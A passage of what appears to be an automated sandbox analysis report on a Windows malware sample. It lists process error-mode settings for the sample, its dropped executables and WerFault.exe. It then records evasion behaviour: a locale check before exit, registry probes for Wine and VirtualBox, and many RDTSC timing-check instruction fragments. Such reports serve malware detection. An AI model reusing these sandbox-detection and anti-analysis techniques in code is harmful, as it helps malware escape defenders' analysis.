dress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004195E0
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Found evasive API chain (may stop execution after checking locale)
                          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-67092
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\userGDHIIIIEHC.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DB02DE second address: DB02E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DB02E4 second address: DB02EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F91E8D54016h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DB02EF second address: DB02FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F91E851B8D6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC97A7 second address: DC97B1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F91E8D54016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC97B1 second address: DC97BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC97BA second address: DC97E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnp 00007F91E8D54016h 0x0000000e jmp 00007F91E8D54020h 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jp 00007F91E8D54016h 0x00000020 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC97E5 second address: DC97EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC97EB second address: DC97F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC97F6 second address: DC9800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC993E second address: DC9948 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91E8D5401Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9A76 second address: DC9AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jne 00007F91E851B8D6h 0x00000013 pop edx 0x00000014 jmp 00007F91E851B8E3h 0x00000019 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9AB0 second address: DC9AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9AB6 second address: DC9AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E8h 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9C1F second address: DC9C25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9C25 second address: DC9C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9C2E second address: DC9C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9C35 second address: DC9C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC9C3A second address: DC9C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCBEF0 second address: DCBF35 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91E851B8D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d ja 00007F91E851B8DCh 0x00000013 jo 00007F91E851B8EBh 0x00000019 jmp 00007F91E851B8E5h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jnl 00007F91E851B8D8h 0x0000002b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC04D second address: DCC05F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F91E8D54033h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC05F second address: DCC063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC0DE second address: DCC0E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC0E3 second address: DCC0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F91E851B8E2h 0x00000010 jl 00007F91E851B8DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC0FB second address: DCC173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 pushad 0x00000006 mov edx, dword ptr [ebp+122D36EFh] 0x0000000c stc 0x0000000d popad 0x0000000e push 00000000h 0x00000010 mov edi, 5FA1AA00h 0x00000015 call 00007F91E8D54019h 0x0000001a jns 00007F91E8D5401Eh 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007F91E8D54020h 0x00000027 jmp 00007F91E8D54021h 0x0000002c popad 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 push edi 0x00000032 push ecx 0x00000033 jg 00007F91E8D54016h 0x00000039 pop ecx 0x0000003a pop edi 0x0000003b mov eax, dword ptr [eax] 0x0000003d jg 00007F91E8D5402Eh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F91E8D54020h 0x0000004a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC25F second address: DCC266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC266 second address: DCC27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F91E8D54016h 0x00000014 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC315 second address: DCC31A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC31A second address: DCC37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F91E8D54028h 0x0000000d nop 0x0000000e jmp 00007F91E8D54027h 0x00000013 push 00000000h 0x00000015 mov edi, edx 0x00000017 call 00007F91E8D54019h 0x0000001c push eax 0x0000001d jno 00007F91E8D5401Ch 0x00000023 pop eax 0x00000024 push eax 0x00000025 pushad 0x00000026 jc 00007F91E8D5401Ch 0x0000002c jl 00007F91E8D54016h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC37F second address: DCC383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC383 second address: DCC3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007F91E8D54026h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F91E8D54021h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC3BF second address: DCC3D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91E851B8DCh 0x00000008 jns 00007F91E851B8D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC3D8 second address: DCC3E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DCC3E2 second address: DCC3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DAE767 second address: DAE77E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54021h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DAE77E second address: DAE784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DAE784 second address: DAE788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEA755 second address: DEA759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEA759 second address: DEA788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E8D54021h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F91E8D54028h 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEA788 second address: DEA78E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEA78E second address: DEA792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEAFC0 second address: DEAFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F91E851B8E7h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB14E second address: DEB153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
